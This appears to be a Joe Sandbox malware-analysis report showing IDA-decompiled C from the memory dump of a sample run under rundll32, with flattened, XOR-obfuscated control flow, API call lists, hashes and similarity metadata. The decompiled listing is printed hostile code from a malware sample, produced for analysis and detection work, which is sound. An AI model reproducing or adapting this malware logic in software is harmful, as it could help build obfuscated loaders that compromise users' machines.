						_t475 = _t464 - 0xe704baa;
						if(_t464 != 0xe704baa) {
							L8:
							__eflags = _t464 - 0x740d40c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E003612A8(_t427, _v2684, _t475, _v2768, _v2736,  &_v2600);
							 *((short*)(E00354FA8(_v2760,  &_v2600, _v2744, _v2604))) = 0;
							E00348650(_v2712,  &_v1560, _t475, _v2728);
							_push(_v2612);
							_push(_v2680);
							_push(0x34181c);
							E0034E7CE(E0034AB66(_v2752, _v2660, _t475), _t475, _v2672,  &_v2600, _v2752, _v2772, _v2776, _v2652, _v2620,  &_v1560);
							E0034AE03(_v2688, _v2704, _v2644, _t415);
							_t427 = _v2764;
							_t404 = E0035C38F(_t427,  &_v2080, _t463, _v2696);
							_t468 =  &(_t468[0x15]);
							if(_t404 != 0) {
								_t464 = 0x2953b22;
								continue;
							}
						}
					}
					return _t404;
				}
				_push(_t427);
				E0034EA7B( &_v1040, _v2708, _v2716, _t427, _v2636, _v2756, _v2608);
				_push(_v2616);
				_push(_v2748);
				_push(0x3418cc);
				E0034E7CE(E0034AB66(_v2668, _v2628, __eflags), __eflags, _v2700,  &_v1040, _v2668, _v2732, _v2656, _v2740, _v2664,  &_v2080);
				_t430 = _v2724;
				E0034AE03(_t430, _v2640, _v2648, _t406);
				_push(_v2632);
				_push(_v2624);
				_push(_v2692);
				_push(0);
				_push(0);
                                                                                                                      				_push(_v2720);
                                                                                                                      				_push(_t430);
                                                                                                                      				_push(0);
                                                                                                                      				_t427 =  &_v520;
                                                                                                                      				_t404 = E00349700(_t427, _v2676, __eflags);
                                                                                                                      				_t468 =  &(_t468[0x1c]);
                                                                                                                      				_t464 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}

































































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AzK$G?$M[>$[B$]\$h$$mP$z-$R)$6q
                                                                                                                      • API String ID: 0-2334141070
                                                                                                                      • Opcode ID: 70e268b9e9c23e6bb35cb627c8fcc46c3df592d2c95685721ff699e4ac15831a
                                                                                                                      • Instruction ID: afbbf616f3d3ae80e8832ca75c367a4bc469fd81ae5b73348bc6bc132fa76b32
                                                                                                                      • Opcode Fuzzy Hash: 70e268b9e9c23e6bb35cb627c8fcc46c3df592d2c95685721ff699e4ac15831a
                                                                                                                      • Instruction Fuzzy Hash: 14121071508381DFD3A9CF21C58AA8FBBE1BBC4718F108A1DE1D98A260D7B19949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3249967234-0
                                                                                                                      • Opcode ID: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction ID: ae62b421250eabce0d7e10c45050fda11272d0be93f4f0cc1201f2dd6aedebe3
                                                                                                                      • Opcode Fuzzy Hash: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction Fuzzy Hash: 1B41DE7990024AAFEB11DBB4DC85AFF77BCEF15355F800529F815E2192EB30A9448A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00346083(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				char _v256;
                                                                                                                      				char _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				void* _t385;
                                                                                                                      				void* _t420;
                                                                                                                      				intOrPtr _t421;
                                                                                                                      				intOrPtr _t422;
                                                                                                                      				void* _t428;
                                                                                                                      				void* _t430;
                                                                                                                      				intOrPtr _t439;
                                                                                                                      				intOrPtr _t440;
                                                                                                                      				intOrPtr _t447;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t451;
                                                                                                                      				void* _t458;
                                                                                                                      				intOrPtr _t460;
                                                                                                                      				intOrPtr _t461;
                                                                                                                      				intOrPtr _t495;
                                                                                                                      				signed int _t502;
                                                                                                                      				signed int _t503;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				signed int* _t516;
                                                                                                                      				void* _t520;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t514 = __edx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t385);
                                                                                                                      				_v320 = 0x5bfd8;
                                                                                                                      				_t516 =  &(( &_v424)[7]);
                                                                                                                      				_v320 = _v320 ^ 0xae83e4b4;
                                                                                                                      				_v320 = _v320 + 0xffffbfdd;
                                                                                                                      				_t448 = 0;
                                                                                                                      				_v320 = _v320 ^ 0xae801261;
                                                                                                                      				_t451 = 0x4bae340;
                                                                                                                      				_v384 = 0x359b5d;
                                                                                                                      				_v384 = _v384 >> 9;
                                                                                                                      				_v384 = _v384 + 0x5a0;
                                                                                                                      				_v384 = _v384 ^ 0x40b7bf66;
                                                                                                                      				_v384 = _v384 ^ 0x40befa95;
                                                                                                                      				_v316 = 0x2933e6;
                                                                                                                      				_t502 = 0x13;
                                                                                                                      				_t504 = 0xf;
                                                                                                                      				_v316 = _v316 * 0x63;
                                                                                                                      				_v316 = _v316 ^ 0x0fe001ce;
                                                                                                                      				_v300 = 0x5708b8;
                                                                                                                      				_v300 = _v300 | 0xa16343bc;
                                                                                                                      				_v300 = _v300 ^ 0xa1786c90;
                                                                                                                      				_v308 = 0x5d4fad;
                                                                                                                      				_v308 = _v308 + 0xffffde8c;
                                                                                                                      				_v308 = _v308 ^ 0x0055ed4e;
                                                                                                                      				_v312 = 0x97068f;
                                                                                                                      				_v312 = _v312 >> 1;
                                                                                                                      				_v312 = _v312 ^ 0x0045ea4b;
                                                                                                                      				_v284 = 0xe9a634;
                                                                                                                      				_v284 = _v284 ^ 0x5bc7ef92;
                                                                                                                      				_v284 = _v284 ^ 0x5b2ed6c9;
                                                                                                                      				_v344 = 0xd52660;
                                                                                                                      				_v344 = _v344 + 0x6034;
                                                                                                                      				_v344 = _v344 >> 7;
                                                                                                                      				_v344 = _v344 ^ 0x000a9937;
                                                                                                                      				_v412 = 0x492529;
                                                                                                                      				_t55 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t55 * 0xa;
                                                                                                                      				_t57 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t57 / _t502;
                                                                                                                      				_t63 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t63 / _t504;
                                                                                                                      				_v412 = _v412 ^ 0x000522b4;
                                                                                                                      				_v360 = 0xff1035;
                                                                                                                      				_v360 = _v360 >> 5;
                                                                                                                      				_v360 = _v360 << 5;
                                                                                                                      				_v360 = _v360 ^ 0x00f6febc;
                                                                                                                      				_v352 = 0x24acbd;
                                                                                                                      				_v352 = _v352 >> 0xc;
                                                                                                                      				_v352 = _v352 * 0x36;
                                                                                                                      				_v352 = _v352 ^ 0x000a49b8;
                                                                                                                      				_v404 = 0x5e8a96;
                                                                                                                      				_v404 = _v404 >> 1;
                                                                                                                      				_v404 = _v404 / _t502;
                                                                                                                      				_v404 = _v404 + 0xffff7de4;
                                                                                                                      				_v404 = _v404 ^ 0x00019221;
                                                                                                                      				_v372 = 0xa45532;
                                                                                                                      				_v372 = _v372 + 0xffff1c48;
                                                                                                                      				_v372 = _v372 + 0xffffe0f0;
                                                                                                                      				_t505 = 0x6c;
                                                                                                                      				_v372 = _v372 * 0x6c;
                                                                                                                      				_v372 = _v372 ^ 0x44ea3f2c;
                                                                                                                      				_v380 = 0xf56085;
                                                                                                                      				_v380 = _v380 / _t505;
                                                                                                                      				_t506 = 0xd;
                                                                                                                      				_v380 = _v380 / _t506;
                                                                                                                      				_v380 = _v380 << 0xe;
                                                                                                                      				_v380 = _v380 ^ 0x0b2ea957;
                                                                                                                      				_v328 = 0x46776f;
                                                                                                                      				_v328 = _v328 + 0x15ec;
                                                                                                                      				_t507 = 0x1c;
                                                                                                                      				_v328 = _v328 * 0x5e;
                                                                                                                      				_v328 = _v328 ^ 0x19ebcb1f;
                                                                                                                      				_v388 = 0xfbc23f;
                                                                                                                      				_v388 = _v388 | 0xf6357e00;
                                                                                                                      				_v388 = _v388 + 0x8932;
                                                                                                                      				_v388 = _v388 ^ 0xf4ea365f;
                                                                                                                      				_v388 = _v388 ^ 0x03ea209f;
                                                                                                                      				_v336 = 0x730db6;
                                                                                                                      				_v336 = _v336 * 0x5b;
                                                                                                                      				_v336 = _v336 | 0x6492896b;
                                                                                                                      				_v336 = _v336 ^ 0x6cf77a3a;
                                                                                                                      				_v340 = 0x166b3b;
                                                                                                                      				_v340 = _v340 | 0x8c211161;
                                                                                                                      				_v340 = _v340 ^ 0x8c378fd9;
                                                                                                                      				_v396 = 0x9d5a93;
                                                                                                                      				_v396 = _v396 / _t507;
                                                                                                                      				_v396 = _v396 ^ 0xba861a50;
                                                                                                                      				_v396 = _v396 + 0xffff5b99;
                                                                                                                      				_v396 = _v396 ^ 0xba80e2b9;
                                                                                                                      				_v420 = 0x409c68;
                                                                                                                      				_t508 = 0x31;
                                                                                                                      				_v420 = _v420 / _t508;
                                                                                                                      				_v420 = _v420 >> 8;
                                                                                                                      				_t509 = 5;
                                                                                                                      				_v420 = _v420 * 0x16;
                                                                                                                      				_v420 = _v420 ^ 0x00013fee;
                                                                                                                      				_v296 = 0xc785e1;
                                                                                                                      				_v296 = _v296 ^ 0x791e03db;
                                                                                                                      				_v296 = _v296 ^ 0x79d79a97;
                                                                                                                      				_v364 = 0xad0976;
                                                                                                                      				_v364 = _v364 | 0x8850e8a8;
                                                                                                                      				_v364 = _v364 << 1;
                                                                                                                      				_v364 = _v364 ^ 0x11fb25d1;
                                                                                                                      				_v368 = 0x704a10;
                                                                                                                      				_v368 = _v368 + 0xffff0d6b;
                                                                                                                      				_v368 = _v368 << 2;
                                                                                                                      				_v368 = _v368 ^ 0x01b3e76e;
                                                                                                                      				_v288 = 0x54d2f6;
                                                                                                                      				_v288 = _v288 / _t509;
                                                                                                                      				_v288 = _v288 ^ 0x001edf05;
                                                                                                                      				_v392 = 0x949bbb;
                                                                                                                      				_v392 = _v392 + 0xbb88;
                                                                                                                      				_v392 = _v392 | 0xb3cb4dcc;
                                                                                                                      				_v392 = _v392 * 0x45;
                                                                                                                      				_v392 = _v392 ^ 0x7b348758;
                                                                                                                      				_v416 = 0x643691;
                                                                                                                      				_v416 = _v416 >> 9;
                                                                                                                      				_v416 = _v416 + 0xffff74a1;
                                                                                                                      				_t510 = 0x4e;
                                                                                                                      				_v416 = _v416 / _t510;
                                                                                                                      				_v416 = _v416 ^ 0x03464fba;
                                                                                                                      				_v356 = 0xeb775b;
                                                                                                                      				_v356 = _v356 + 0xdb8c;
                                                                                                                      				_v356 = _v356 >> 0x10;
                                                                                                                      				_v356 = _v356 ^ 0x0001ede4;
                                                                                                                      				_v304 = 0xc1e7b5;
                                                                                                                      				_v304 = _v304 + 0xf3ef;
                                                                                                                      				_v304 = _v304 ^ 0x00c2397a;
                                                                                                                      				_v376 = 0xa68bc9;
                                                                                                                      				_t511 = 0x43;
                                                                                                                      				_v376 = _v376 / _t511;
                                                                                                                      				_v376 = _v376 >> 8;
                                                                                                                      				_v376 = _v376 ^ 0x3383f04e;
                                                                                                                      				_v376 = _v376 ^ 0x3381e4d6;
                                                                                                                      				_v408 = 0x4d9cfa;
                                                                                                                      				_t512 = 0x46;
                                                                                                                      				_t503 = _v340;
                                                                                                                      				_v408 = _v408 * 0x6f;
                                                                                                                      				_v408 = _v408 + 0x3c4a;
                                                                                                                      				_v408 = _v408 << 2;
                                                                                                                      				_v408 = _v408 ^ 0x869e5b7f;
                                                                                                                      				_v324 = 0x71360b;
                                                                                                                      				_v324 = _v324 * 0xc;
                                                                                                                      				_v324 = _v324 ^ 0x901d1633;
                                                                                                                      				_v324 = _v324 ^ 0x9559eaf9;
                                                                                                                      				_v292 = 0x9a124c;
                                                                                                                      				_v292 = _v292 + 0x530b;
                                                                                                                      				_v292 = _v292 ^ 0x0097d0f0;
                                                                                                                      				_v424 = 0x6705b6;
                                                                                                                      				_v424 = _v424 ^ 0xd04d23dd;
                                                                                                                      				_v424 = _v424 << 4;
                                                                                                                      				_v424 = _v424 >> 0xa;
                                                                                                                      				_v424 = _v424 ^ 0x000c33e5;
                                                                                                                      				_v348 = 0x1e9503;
                                                                                                                      				_v348 = _v348 >> 3;
                                                                                                                      				_v348 = _v348 ^ 0x290fe667;
                                                                                                                      				_v348 = _v348 ^ 0x2908b2d4;
                                                                                                                      				_v400 = 0xb348f5;
                                                                                                                      				_v400 = _v400 ^ 0x711fc93f;
                                                                                                                      				_v400 = _v400 << 8;
                                                                                                                      				_v400 = _v400 * 0x58;
                                                                                                                      				_v400 = _v400 ^ 0x4c97e764;
                                                                                                                      				_v332 = 0xe64092;
                                                                                                                      				_t513 = _v340;
                                                                                                                      				_v332 = _v332 / _t512;
                                                                                                                      				_v332 = _v332 + 0x1e96;
                                                                                                                      				_v332 = _v332 ^ 0x00036ca6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t420 = 0xee6d0ab;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t520 = _t451 - 0x77439d8;
                                                                                                                      							if(_t520 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t520 == 0) {
                                                                                                                      								E003468DE(_v420, _v296, _v364, _v368, _v264);
                                                                                                                      								_t516 =  &(_t516[3]);
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0x195d899) {
                                                                                                                      									_t460 =  *0x365214; // 0x0
                                                                                                                      									_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0x3c)) + 0x58));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
                                                                                                                      									_t495 =  *((intOrPtr*)(_t460 + 0x38));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
                                                                                                                      									if(_t439 == 0) {
                                                                                                                      										 *((intOrPtr*)(_t460 + 0x3c)) =  *((intOrPtr*)(_t460 + 4));
                                                                                                                      									}
                                                                                                                      									_t440 =  *0x365214; // 0x0
                                                                                                                      									if(_t495 >=  *((intOrPtr*)(_t440 + 0x44))) {
                                                                                                                      										_t461 =  *0x365214; // 0x0
                                                                                                                      										 *(_t461 + 0x38) =  *(_t461 + 0x38) & 0x00000000;
                                                                                                                      									} else {
                                                                                                                      										_t451 = 0x4bae340;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 == 0x2f9aadd) {
                                                                                                                      										E003468DE(_v288, _v392, _v416, _v356, _v280);
                                                                                                                      										E003468DE(_v304, _v376, _v408, _v324, _t513);
                                                                                                                      										E003468DE(_v292, _v424, _v348, _v400, _v272);
                                                                                                                      										_t516 =  &(_t516[9]);
                                                                                                                      										_t451 = _t503;
                                                                                                                      										L33:
                                                                                                                      										_t420 = 0xee6d0ab;
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										if(_t451 == 0x4bae340) {
                                                                                                                      											_t513 = 0;
                                                                                                                      											E00361310(0x100,  &_v256, _v320, _v384, _v316, _v300);
                                                                                                                      											_v272 = _v272 & 0;
                                                                                                                      											_t516 =  &(_t516[4]);
                                                                                                                      											_v268 = _v268 & 0;
                                                                                                                      											_t451 = 0xce40172;
                                                                                                                      											_v280 = _v280 & 0;
                                                                                                                      											_v276 = _v276 & 0;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t451 != 0x55bcf65) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												if(_v276 >= _v332) {
                                                                                                                      													_t447 = E00356864( &_v280,  &_v272);
                                                                                                                      												} else {
                                                                                                                      													_t447 = E00352753( &_v280);
                                                                                                                      												}
                                                                                                                      												_t513 = _t447;
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L37:
                                                                                                                      							return _t448;
                                                                                                                      						}
                                                                                                                      						if(_t451 == 0xa3ea571) {
                                                                                                                      							_t421 =  *0x365214; // 0x0
                                                                                                                      							_t422 =  *0x365214; // 0x0
                                                                                                                      							_t428 = E00357BCA(( *(_t421 + 0x3c))[0x28] & 0x0000ffff,  &_v256,  *( *(_t421 + 0x3c)) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *((intOrPtr*)(_t422 + 0x3c)) + 0x20, _v336);
                                                                                                                      							_t516 =  &(_t516[0xa]);
                                                                                                                      							if(_t428 == 0) {
                                                                                                                      								_t503 = 0x195d899;
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_t451 = 0xcddb738;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t451 == 0xcddb738) {
                                                                                                                      								if(E0034BD0F( &_v264, _v340, _t514, _v396) == 0) {
                                                                                                                      									_t503 = 0x195d899;
                                                                                                                      								} else {
                                                                                                                      									_t503 = 0x1fe0da0;
                                                                                                                      									_t448 = 1;
                                                                                                                      								}
                                                                                                                      								_t451 = 0x77439d8;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0xce40172) {
                                                                                                                      									_t430 = E00341F9B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
                                                                                                                      									_t516 =  &(_t516[5]);
                                                                                                                      									if(_t430 != 0) {
                                                                                                                      										_t451 = 0x55bcf65;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 != _t420) {
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										_push(E0034EF71(1, 0x40));
                                                                                                                      										_push(_v404);
                                                                                                                      										_push( &_v256);
                                                                                                                      										_t458 = 0xb;
                                                                                                                      										E00345A07(_t458, _v352);
                                                                                                                      										_t516 =  &(_t516[5]);
                                                                                                                      										_t451 = 0xa3ea571;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L37;
                                                                                                                      						L34:
                                                                                                                      					} while (_t451 != 0x1fe0da0);
                                                                                                                      					goto L37;
                                                                                                                      				}
                                                                                                                      			}
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x00346609
                                                                                                                      0x0034660f
                                                                                                                      0x00000000
                                                                                                                      0x00346615
                                                                                                                      0x00346627
                                                                                                                      0x00346637
                                                                                                                      0x00346629
                                                                                                                      0x00346629
                                                                                                                      0x00346629
                                                                                                                      0x0034663c
                                                                                                                      0x00346645
                                                                                                                      0x0034664a
                                                                                                                      0x00000000
                                                                                                                      0x0034664a
                                                                                                                      0x0034660f
                                                                                                                      0x00346607
                                                                                                                      0x003465fb
                                                                                                                      0x003465ef
                                                                                                                      0x003468d4
                                                                                                                      0x003468dd
                                                                                                                      0x003468dd
                                                                                                                      0x00346774
                                                                                                                      0x0034684d
                                                                                                                      0x0034685c
                                                                                                                      0x00346894
                                                                                                                      0x00346899
                                                                                                                      0x0034689e
                                                                                                                      0x003468aa
                                                                                                                      0x003468af
                                                                                                                      0x00000000
                                                                                                                      0x003468a0
                                                                                                                      0x003468a0
                                                                                                                      0x00000000
                                                                                                                      0x003468a0
                                                                                                                      0x0034677a
                                                                                                                      0x00346780
                                                                                                                      0x0034682e
                                                                                                                      0x0034683a
                                                                                                                      0x00346830
                                                                                                                      0x00346832
                                                                                                                      0x00346837
                                                                                                                      0x00346837
                                                                                                                      0x0034683f
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x00346786
                                                                                                                      0x0034678c
                                                                                                                      0x003467fb
                                                                                                                      0x00346800
                                                                                                                      0x00346805
                                                                                                                      0x0034680b
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x0034678e
                                                                                                                      0x00346790
                                                                                                                      0x00000000
                                                                                                                      0x00346796
                                                                                                                      0x003467a7
                                                                                                                      0x003467a8
                                                                                                                      0x003467b7
                                                                                                                      0x003467ba
                                                                                                                      0x003467bb
                                                                                                                      0x003467c0
                                                                                                                      0x003467c3
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00346790
                                                                                                                      0x0034678c
                                                                                                                      0x00346780
                                                                                                                      0x00000000
                                                                                                                      0x003468b9
                                                                                                                      0x003468b9
                                                                                                                      0x00000000
                                                                                                                      0x003468c5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: 374c5e616a7febd5da3f0fe83014393f82ecbe67cecfbccc304677ea1f8e64e6
                                                                                                                      • Instruction ID: 5e76fe3fb67616fcccb3c3faeaf28da137e167cbc3ee2df1a726b9c366722137
                                                                                                                      • Opcode Fuzzy Hash: 374c5e616a7febd5da3f0fe83014393f82ecbe67cecfbccc304677ea1f8e64e6
                                                                                                                      • Instruction Fuzzy Hash: 3B224F71508380CFD369CF25C486A9BBBE2FBC5758F10891DF68A8A261D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E003599AA() {
                                                                                                                      				void* _t393;
                                                                                                                      				signed int _t395;
                                                                                                                      				signed int _t396;
                                                                                                                      				signed int _t399;
                                                                                                                      				signed int _t401;
                                                                                                                      				signed int _t405;
                                                                                                                      				signed int _t416;
                                                                                                                      				void* _t420;
                                                                                                                      				intOrPtr* _t464;
                                                                                                                      				signed int _t468;
                                                                                                                      				signed int _t471;
                                                                                                                      				signed int _t472;
                                                                                                                      				signed int _t473;
                                                                                                                      				signed int _t474;
                                                                                                                      				signed int _t475;
                                                                                                                      				signed int _t476;
                                                                                                                      				signed int _t477;
                                                                                                                      				signed int _t478;
                                                                                                                      				signed int _t479;
                                                                                                                      				signed int _t480;
                                                                                                                      				signed int _t481;
                                                                                                                      				signed int _t482;
                                                                                                                      				signed int _t483;
                                                                                                                      				signed int _t485;
                                                                                                                      				void* _t489;
                                                                                                                      
                                                                                                                      				 *(_t489 + 0x98) = 0xc8da52;
                                                                                                                      				 *(_t489 + 0xa0) = 0;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x9c)) = 0xe0694f;
                                                                                                                      				_t420 = 0x1be807e;
                                                                                                                      				 *(_t489 + 0x30) = 0x503fa2;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) >> 8;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) | 0x613cd221;
                                                                                                                      				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0x613cd23e;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x18)) = 0x638b33;
                                                                                                                      				 *((intOrPtr*)(_t489 + 0x18)) =  *((intOrPtr*)(_t489 + 0x18)) + 0x7670;
                                                                                                                      				 *(_t489 + 0xa4) = 0;
                                                                                                                      				_t471 = 0x25;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x28) / _t471;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) + 0xfffff8bb;
                                                                                                                      				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) ^ 0x0002acab;
                                                                                                                      				 *(_t489 + 0x7c) = 0x85e0fa;
